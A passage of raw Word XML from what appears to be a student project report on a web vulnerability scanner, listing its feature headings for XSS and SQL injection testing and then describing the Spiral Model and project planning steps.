          <w:rStyle w:val="17"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Payload Management:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>Supports custom payloads by allowing users to specify payload files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>Provides default payloads for XSS and SQL injection testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:right="0" w:rightChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Error Handling and Fault Detection:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Detects and handles unexpected browser alerts during XSS testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Checks for SQL error messages and server error codes to identify successful SQL injection attempts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Resets the web driver upon encountering critical errors to ensure continuous scanning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:right="0" w:rightChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Extensibility:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>Modular design allows for easy addition of new vulnerability types and payloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>Open to integration with other security tools and frameworks for enhanced functionality.</w:t>
      </w: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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc4034"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>System Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc25664"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240"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pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc3591"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Analysis Model</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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This document plays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pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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SPIRAL MODEL was defined by Barry Boehm in his 1988 article, “A Spiral Model of Software Development and Enhancement.  This model was not the first model to discuss iterative development, but it was the first model to explain why the iteration models.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"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The steps for Spiral Model can be generalized as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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·The new system requirements are defined in as much details as possible.  This usually involves interviewing a number of users representing all the external or internal users and other aspects of the existing system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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·A preliminary design is created for the new system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>·A first prototype of the new system is constructed from the preliminary design.  This is usually a scaled-down system, and represents an approximation of the characteristics of the final product.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20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·A second prototype is evolved by a fourfold procedure:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1260" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">1.  </w:t>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Evaluating the first prototype in terms of its strengths, weakness, and risks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1170" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">2.  </w:t>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Defining the requirements of the second prototype.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1170" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">3.  </w:t>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Planning an designing the second prototype.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1170" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">4.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Constructing and testing the second prototype.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="20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pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="20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The existing prototype is evaluated in the same manner as was the previous prototype, and if necessary, another prototype is developed from it according to the fourfold procedure outlined above.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="20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The preceding steps are iterated until the customer is satisfied that the refined prototype represents the final product desired.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="20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The final system is constructed, based on the refined prototype.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:after="20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The final system is thoroughly evaluated and tested.   Routine maintenance is carried on a continuing basis to prevent large scale failures and to minimize down time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080" w:leftChars="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5743575" cy="57340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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5743575" cy="5734050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="720"/>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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_nr2e7tz90auw" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> Spiral model </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="200" w:line="276"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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="44"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc43339137"/>
      <w:bookmarkStart w:id="38" w:name="_Toc27619"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="44"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Project Planning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="192" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="192" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:p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Working in a team implies the need for some common guidelines and standards to be followed by team members across all teams. For optimum usage of the available machine time, it is necessary that every session is planned. Planning of project will include the following:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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Understanding the topic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>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Proposed Modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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Modular break-up of the system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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Process logic for each module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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File structure definition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>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Documentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc3562"/>
      <w:bookmarkStart w:id="40" w:name="_Toc43339138"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
